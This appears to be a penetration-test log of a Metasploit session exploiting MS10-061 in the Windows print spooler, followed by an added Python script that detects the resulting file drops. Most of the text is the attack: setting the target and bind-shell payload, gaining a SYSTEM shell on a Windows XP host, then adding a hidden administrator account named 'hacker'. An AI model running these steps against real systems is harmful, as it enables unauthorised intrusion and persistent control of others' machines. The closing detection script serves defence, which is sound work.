[*] Please wait while the Metasploit Pro Console initializes...
[*] Starting Metasploit Console...
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 840 exploits - 495 auxiliary - 146 post
+ -- --=[ 250 payloads - 27 encoders - 8 nops
[*] Successfully loaded plugin: pro
msf > search ms10_061
Matching Modules
================
Name                                  Disclosure Date  Rank       Description
----                                  ---------------  ----       -----------
exploit/windows/smb/ms10_061_spoolss  2010-09-14       excellent  Microsoft Print Spooler Service Impersonation Vulnerability
msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > info
Name: Microsoft Print Spooler Service Impersonation Vulnerability
Module: exploit/windows/smb/ms10_061_spoolss
Version: 14976
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
jduck <jduck@metasploit.com>
hdm <hdm@metasploit.com>
Available targets:
Id  Name
--  ----
0   Windows Universal
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
PNAME                     no        The printer share name to use on the target
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  spoolss          no        The named pipe for the spooler service
Payload information:
Space: 1024
Avoid: 0 characters
Description:
This module exploits the RPC service impersonation vulnerability
detailed in Microsoft Bulletin MS10-061. By making a specific DCE
RPC request to the StartDocPrinter procedure, an attacker can
impersonate the Printer Spooler service to create a file. The
working directory at the time is %SystemRoot%\system32. An attacker
can specify any file name, including directory traversal or full
paths. By sending WritePrinter requests, an attacker can fully
control the content of the created file. In order to gain code
execution, this module writes to a directory used by Windows
Management Instrumentation (WMI) to deploy applications. This
directory (Wbem\Mof) is periodically scanned and any new .mof files
are processed automatically. This is the same technique employed by
the Stuxnet code found in the wild.
References:
http://www.osvdb.org/67988
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx
msf exploit(ms10_061_spoolss) > set RHOST 142.168.2.20
RHOST => 142.168.2.20
msf exploit(ms10_061_spoolss) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms10_061_spoolss) > info
Name: Microsoft Print Spooler Service Impersonation Vulnerability
Module: exploit/windows/smb/ms10_061_spoolss
Version: 14976
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
jduck <jduck@metasploit.com>
hdm <hdm@metasploit.com>
Available targets:
Id  Name
--  ----
0   Windows Universal
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
PNAME                     no        The printer share name to use on the target
RHOST    142.168.2.20     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  spoolss          no        The named pipe for the spooler service
Payload information:
Space: 1024
Avoid: 0 characters
Description:
This module exploits the RPC service impersonation vulnerability
detailed in Microsoft Bulletin MS10-061. By making a specific DCE
RPC request to the StartDocPrinter procedure, an attacker can
impersonate the Printer Spooler service to create a file. The
working directory at the time is %SystemRoot%\system32. An attacker
can specify any file name, including directory traversal or full
paths. By sending WritePrinter requests, an attacker can fully
control the content of the created file. In order to gain code
execution, this module writes to a directory used by Windows
Management Instrumentation (WMI) to deploy applications. This
directory (Wbem\Mof) is periodically scanned and any new .mof files
are processed automatically. This is the same technique employed by
the Stuxnet code found in the wild.
References:
http://www.osvdb.org/67988
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx
msf exploit(ms10_061_spoolss) > exploit
[*] Started bind handler
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...
[*] Attempting to exploit MS10-061 via \\142.168.2.20\SmartPrinter ...
[*] Printer handle: 00000000950606c7fee7b348bc5b841597479b61
[*] Job started: 0x4
[*] Wrote 73802 bytes to %SystemRoot%\system32\9o43IDgKLE0SjU.exe
[*] Job started: 0x5
[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\vWMbWpPJt8K6aD.mof
[*] Everything should be set, waiting for a session...
[*] Sending stage (240 bytes) to 142.168.2.20
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user
net user
\\ 的用户帐户
-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
IUSR_INTRA-PC            IWAM_INTRA-PC            shentouceshiwy
SUPPORT_388945a0
命令运行完毕，但发生一个或多个错误。
C:\WINDOWS\system32>net user hacker 123 /add & net localgroup administrators hacker /add
net user hacker 123 /add & net localgroup administrators hacker /add
命令成功完成。
命令成功完成。
C:\WINDOWS\system32>net user
net user
\\ 的用户帐户
-------------------------------------------------------------------------------
Administrator            Guest                    hacker
HelpAssistant            IUSR_INTRA-PC            IWAM_INTRA-PC
shentouceshiwy           SUPPORT_388945a0
命令运行完毕，但发生一个或多个错误。
C:\WINDOWS\system32>
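The module description above gives a defender two concrete signals: the print spooler (spoolsv.exe, running as SYSTEM) writing an executable into %SystemRoot%\system32, and any file landing in Wbem\Mof, where WMI autocompiles it. The following detection is an added example, not part of the original post or of Metasploit; it runs over constructed Sysmon-style FileCreate records (event ID 11, assumed field names Image and TargetFilename) that mirror the two writes shown in the session, with C:\WINDOWS assumed as the system root.

```python
from typing import Iterable, List, Optional, Tuple

# Locations named in the MS10-061 module description (assumed system root C:\WINDOWS).
SYSTEM32 = r"c:\windows\system32"
MOF_DIR = SYSTEM32 + r"\wbem\mof"

# Constructed Sysmon-style FileCreate events (ID 11): "Image" is the writing
# process, "TargetFilename" the file it created. The first two reproduce the
# drops seen in the exploit session; the last two are benign comparison cases.
SAMPLE_EVENTS = [
    {"EventId": 11, "Image": r"C:\WINDOWS\system32\spoolsv.exe",
     "TargetFilename": r"C:\WINDOWS\system32\9o43IDgKLE0SjU.exe"},
    {"EventId": 11, "Image": r"C:\WINDOWS\system32\spoolsv.exe",
     "TargetFilename": r"C:\WINDOWS\system32\wbem\mof\vWMbWpPJt8K6aD.mof"},
    {"EventId": 11, "Image": r"C:\WINDOWS\system32\spoolsv.exe",
     "TargetFilename": r"C:\WINDOWS\system32\spool\PRINTERS\00004.SPL"},  # normal spooling
    {"EventId": 11, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetFilename": r"C:\WINDOWS\system32\wbem\mof\product.mof"},  # installer registering a class
]


def classify(event: dict) -> Optional[str]:
    """Return a verdict for one FileCreate event, or None if it is uninteresting."""
    if event.get("EventId") != 11:
        return None
    image = event["Image"].lower()
    target = event["TargetFilename"].lower()
    spooler = image.endswith(r"\spoolsv.exe")
    in_mof_dir = target.startswith(MOF_DIR + "\\")
    executable = target.endswith((".exe", ".dll"))
    # The spooler has no business writing into the WMI autocompile directory.
    if spooler and in_mof_dir:
        return "high: print spooler wrote into wbem\\mof (MS10-061 pattern)"
    # Nor dropping executables into its own working directory, system32.
    if spooler and executable and target.startswith(SYSTEM32 + "\\"):
        return "high: print spooler dropped an executable into system32"
    # Any other MOF drop is worth a low-priority record: it will be autocompiled.
    if in_mof_dir and target.endswith(".mof"):
        return "info: MOF queued for autocompile by " + image.rsplit("\\", 1)[-1]
    return None


def scan(events: Iterable[dict]) -> List[Tuple[str, str]]:
    """Collect (file, verdict) pairs for every event that classify() flags."""
    hits = []
    for event in events:
        verdict = classify(event)
        if verdict:
            hits.append((event["TargetFilename"], verdict))
    return hits


if __name__ == "__main__":
    for path, verdict in scan(SAMPLE_EVENTS):
        print(f"{verdict:60} {path}")
```

A spooler file write is not rare in itself (spool files under spool\PRINTERS are routine), so the rule keys on the destination rather than on the process alone.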

Penetration notes, 2013-07-13: ms10_061_spoolss